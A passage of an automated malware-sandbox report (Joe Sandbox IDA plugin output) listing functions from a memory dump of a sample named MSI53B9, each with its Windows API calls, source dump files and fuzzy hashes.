Opcode Fuzzy Hash: b054bb888ee7d0cf0dd39ae527810503f4394f277f8a89c32fa883ce1b6fb282
Instruction Fuzzy Hash: 3E316F3190420AEFDF11FBA8D841A9D7BE4FF42320F294199E804DB691EF359D41CB55

Function 008794F1 Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00879B87,?,?,00877735), ref: 00879579
CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00879B87,?,?,00877735), ref: 008795AE

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1bdef6b471f2c0093db29c57392cbf02d2e70bcce566789c7d714823d1fed363
Instruction ID: f4cb42ecae24f850adada3cb614977015048817ad61e3e02a757cb325b433e4d
Opcode Fuzzy Hash: 1bdef6b471f2c0093db29c57392cbf02d2e70bcce566789c7d714823d1fed363
Instruction Fuzzy Hash: DC21E1B1004748AFE7318F18C885BA7B7E8FB49768F00892DF5E9C2595C274ED498B61

Function 00879A12 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,00877436,?,?,?), ref: 00879A2C
SetFileTime.KERNELBASE(?,?,?,?), ref: 00879ADC

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 55e5fb5007035a63f98216cced1e4d5bd6538408c1a74faecc7843362542bfe7
Instruction ID: 4f06cc1205a8f4db755da0d47f25b1a08213574ca9f1b7c294c185b312f5a998
Opcode Fuzzy Hash: 55e5fb5007035a63f98216cced1e4d5bd6538408c1a74faecc7843362542bfe7
Instruction Fuzzy Hash: 5121F331149395AFC711DE28C881AAAFBD8FF96704F08891CF8D9C7195DB29ED08C752

Function 00897735 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00897795
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 008977A2

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 55746ee8cc19e97c4bba8134b3d41162d69ef472e9d4000a8d79fba2a945edfe
Instruction ID: 263494e551e521f7925728f4bc579f84b80206630cc37077571801f80875f6ef
Opcode Fuzzy Hash: 55746ee8cc19e97c4bba8134b3d41162d69ef472e9d4000a8d79fba2a945edfe
Instruction Fuzzy Hash: 89110637A14621BBEF25AFA8EC809AA7395FB85720B1E0220FD15EB654DB31DC4187D1

Function 00879AEB Relevance: 3.1, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00879B21
GetLastError.KERNEL32 ref: 00879B2D

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: f9546a0e65f14ae8a5bed655e33217ff0ba243ac5f686f1c6d091c16b2bf65ef
Instruction ID: 4532641b668d39763ffc84c78fa9e7c8b0703b1eb2641e99db1657c4ae5a6753
Opcode Fuzzy Hash: f9546a0e65f14ae8a5bed655e33217ff0ba243ac5f686f1c6d091c16b2bf65ef
Instruction Fuzzy Hash: 5B01DE713007146BEB349E28EC84B6AB3D9FB85328F10853EF19AC3684DA31E8088621

Function 00879897 Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 008798EB
GetLastError.KERNEL32 ref: 008798F8

Part of subcall function 008796AA: __EH_prolog.LIBCMT ref: 008796AF

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: ErrorFileH_prologLastPointer
String ID:
API String ID: 4236474358-0
Opcode ID: 01851d13d912907aeca4f8c39d7fd559d944dc8c52746bacf9a9bfcd59deaf98
Instruction ID: fbe1ee754cf5232d220b40db6a640b79243e7bbd96f38e21a6ed9da29167e498
Opcode Fuzzy Hash: 01851d13d912907aeca4f8c39d7fd559d944dc8c52746bacf9a9bfcd59deaf98
Instruction Fuzzy Hash: 9301D4326046099BDB188E598C44AAB7B59FF57330714C27DF9BECB698D730EC019762

Function 00895AEA Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00895B0B

Part of subcall function 008959FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,008923AA,?,0000015D,?,?,?,?,00892F29,000000FF,00000000,?,?), ref: 00895A2E

HeapReAlloc.KERNEL32(00000000,?,00200000,?,?,008ACBE8,008717A1,?,?,?,?,00000000,?,00871378,?,?), ref: 00895B47

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: ad214777fb002ff234eb0d71d60a84e45ae1af86c58f3b7e1d496c2fa9682859
Instruction ID: 1532fe419d9886295e121df6d8a44a5b2c343607bd34c64bb32f74e8840da2fa
Opcode Fuzzy Hash: ad214777fb002ff234eb0d71d60a84e45ae1af86c58f3b7e1d496c2fa9682859
Instruction Fuzzy Hash: 7EF04F32701A15A6AF233A29AC01F6A3758FF91771B5C4115F818E61A1DB30880183A2

Function 0087D142 Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

LoadStringW.USER32(?,?,00000200,?), ref: 0087D187
LoadStringW.USER32(?,?,00000200,?), ref: 0087D19D

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 12f5b91809057631d200d9252083187bbdecf5480d7690ab6b2d8daee46ae9e6
Instruction ID: b2c19bcb63243b4e5efd8067fb073734205851ea10b589ac25b4258aa65973a6
Opcode Fuzzy Hash: 12f5b91809057631d200d9252083187bbdecf5480d7690ab6b2d8daee46ae9e6
Instruction Fuzzy Hash: 22F0C8327112287FFA115F50AC45FA7BE59FF163A0F010825FA88D7961D6128C06D7B0

Function 0087FCA6 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 0087FCB3
GetProcessAffinityMask.KERNEL32(00000000), ref: 0087FCBA

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 9ceeb939420cb3d4dec4e6f72c935f81a3cde27fbbdd5ec49de9f0070769db33
Instruction ID: ff749066a2e773c6af256f8250b4877fadebb59f5a10f3bddafefff65b1b4c5b
Opcode Fuzzy Hash: 9ceeb939420cb3d4dec4e6f72c935f81a3cde27fbbdd5ec49de9f0070769db33
Instruction Fuzzy Hash: 80E09232E1412E679F1A8AA59C059EF739DFB85300724C17AEE0ED3605FA34DD014BA0

Function 0087A0C3 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00879EF9,?,?,?,00879D92,?,00000001,00000000,?,?), ref: 0087A0D7
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00879EF9,?,?,?,00879D92,?,00000001,00000000,?,?), ref: 0087A108

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1634c49ba1d15f88d462897d956079be3ed0a4391068b04ccb1e68d025c2b0a0
Instruction ID: dd552b58baee30f565169180a2821ef1408d7f4d9acd56baf805d211e13c1522
Opcode Fuzzy Hash: 1634c49ba1d15f88d462897d956079be3ed0a4391068b04ccb1e68d025c2b0a0
Instruction Fuzzy Hash: F5F0A031280109ABEF116F64EC01BDE776DFF04381F44C061B988C6069DB32DA989B61

Function 0088C0D0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0088C0FE
SetDlgItemTextW.USER32(00000065,?), ref: 0088C115

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: ItemText_swprintf
String ID:
API String ID: 3011073432-0
Opcode ID: 7ce322625ce38bb5369d233cc3e58f06e66e0bba348bcb507d11c4ade6493ea9
Instruction ID: 48762e8a7d88a606bc6500b3d506c5d9787fa900a89a57aa75f6b57b5a29f89b
Opcode Fuzzy Hash: 7ce322625ce38bb5369d233cc3e58f06e66e0bba348bcb507d11c4ade6493ea9
Instruction Fuzzy Hash: D3F0EC3255474CB7E711BBA4DC06F993B5DFB04381F044096F605D20A6E6715A209773

Function 00879DAC Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,00879611,?,?,0087946C), ref: 00879DBD
DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00879611,?,?,0087946C), ref: 00879DEB

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 748850104a32eb51a393f0ef767d296be6fc0112538c1eb557576d811f62ee0e
Instruction ID: 8e2c5ab403cf85bee6c4cd45f7836a458a4728ebab96232377ae25741b82aa22
Opcode Fuzzy Hash: 748850104a32eb51a393f0ef767d296be6fc0112538c1eb557576d811f62ee0e
Instruction Fuzzy Hash: 3BE0923165120DABEB20AFA5DC41BEA779EFF09381F848061FA88C2054DB31DD949AA0

Function 00879E13 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,00879E08,?,008775A0,?,?,?,?), ref: 00879E24
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00879E08,?,008775A0,?,?,?,?), ref: 00879E50

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 178dbb5a7c5c8998e0e4c25a0aee2225d57e8c8cc2650b0d68dcb515ac2f83e4
Instruction ID: de42d794e139a3d8c51ee4b2f4b6b40c59bb0f273ca9d467df0b4dcd39cc2b80
Opcode Fuzzy Hash: 178dbb5a7c5c8998e0e4c25a0aee2225d57e8c8cc2650b0d68dcb515ac2f83e4
Instruction Fuzzy Hash: 10E06D325002686BDB10EA68DC05BDA7759FB097A2F0482A1FE88E3294D6709D888BD0

Function 0087F309 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0087F324
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0087DEC8,Crypt32.dll,?,0087DF4A,?,0087DF2E,?,?,?,?), ref: 0087F346

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: f6d35b0a50a59b11ec73ecc9f7ab88a55a53f350c867a84af66f7d795f66c71f
Instruction ID: 833477c3e5e8b5ee7a520ae725ed22714b40117b4d4c849c443406850a520f15
Opcode Fuzzy Hash: f6d35b0a50a59b11ec73ecc9f7ab88a55a53f350c867a84af66f7d795f66c71f
Instruction Fuzzy Hash: 7EE012728111186BDB11AAA4DC05FEB776CFB093C1F0440A5B948D3105DA74D940CBB1

Function 00888924 Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00888945
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0088894C

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 95f3e3472ce487bca1444d1d36a3ddba2ec190df2fd0ee4ef00cb9049e497dee
Instruction ID: f084f5dc7c2e0a19995424621a3ad358d789cd66ebe6d3c33d4e7e7970c61461
Opcode Fuzzy Hash: 95f3e3472ce487bca1444d1d36a3ddba2ec190df2fd0ee4ef00cb9049e497dee
Instruction Fuzzy Hash: 2AE06D75800208EFCB50FF88C8017A9BBE8FB08321F10806AE845D3700E770AE049BA2

Function 0088909E Relevance: 3.0, APIs: 2, Instructions: 22comCOMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,0089F79B,000000FF), ref: 008890C7
OleUninitialize.OLE32(?,?,?,0089F79B,000000FF), ref: 008890CC

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 36f0f0833907d68061e641382d37be47e56e1250f3ac239e134d8606e82fb664
Instruction ID: 59f0c17c472baec98d0d09b12e7d0dbfee3101d8321cf501c694a0785588fb10
Opcode Fuzzy Hash: 36f0f0833907d68061e641382d37be47e56e1250f3ac239e134d8606e82fb664
Instruction Fuzzy Hash: 56E01A32548A44AFC714EB8CDD45B45BBE9FB09B20F008769B92AC3B60CB396840CB91

Function 00890CA6 Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 00891D9A: try_get_function.LIBVCRUNTIME ref: 00891DAF

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00890CC4
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00890CCF

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: b667425466d4e30dcf95b971a108ee069aa27d55a67d80b262318bef4a035207
Instruction ID: 82876f2f51a93f7ea9911c9957f775db6693332f546093e7e6d46b8804cc2cb9
Opcode Fuzzy Hash: b667425466d4e30dcf95b971a108ee069aa27d55a67d80b262318bef4a035207
Instruction Fuzzy Hash: 89D0A72554C30A2C2E143378281246A2344F742BBC7680346E032D5AC1EB1481419913

Function 008712C2 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 008712D7
ShowWindow.USER32(00000000), ref: 008712DE

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: b47e00942b9ebb1024b65f5144f7fd068793714165360800a6b241846da30f0a
Instruction ID: 97bac4796dc53a0df8d1463fcb050f0cb685d408516c445a1ced5bc8c764489c
Opcode Fuzzy Hash: b47e00942b9ebb1024b65f5144f7fd068793714165360800a6b241846da30f0a
Instruction Fuzzy Hash: E2C01232058100BFDB010B70DC09C2EBBA9AB96621F00C904B4A5C0460C338C010DB22

Function 0087FC30 Relevance: 2.5, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(008B1E74,?,?,?,?,0087A5A0,?,?,?,?,0089F79B,000000FF), ref: 0087FC42
LeaveCriticalSection.KERNEL32(008B1E74,?,?,?,?,0087A5A0,?,?,?,?,0089F79B,000000FF), ref: 0087FC99

Part of subcall function 0087F9D1: ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 0087FA05
Part of subcall function 0087F9D1: CloseHandle.KERNEL32(?,?), ref: 0087FA1F
Part of subcall function 0087F9D1: DeleteCriticalSection.KERNEL32(?), ref: 0087FA38
Part of subcall function 0087F9D1: FindCloseChangeNotification.KERNELBASE(?), ref: 0087FA44
Part of subcall function 0087F9D1: CloseHandle.KERNEL32(?), ref: 0087FA50

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: CloseCriticalSection$Handle$ChangeDeleteEnterFindLeaveNotificationReleaseSemaphore
String ID:
API String ID: 2851692498-0
Opcode ID: 8c99e87c0ec6a3786d497367be2956edae8cfbd5e1aa3ffcf4493f0a974982bb
Instruction ID: a6aa2d9856861d978fc3a195d121dd53dcb737d9bff8d1df31555cd89c09c8ac
Opcode Fuzzy Hash: 8c99e87c0ec6a3786d497367be2956edae8cfbd5e1aa3ffcf4493f0a974982bb
Instruction Fuzzy Hash: 83F0CD331041245BDA126726EC8457E771CF7C57643558226FF08EB14BDB35EC0187A1

Function 008719B1 Relevance: 1.8, APIs: 1, Instructions: 275COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008719B6

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: de294797e349cc1dd044812fcf4fb160f47586452ffd66d93e68bb495b84f8b3
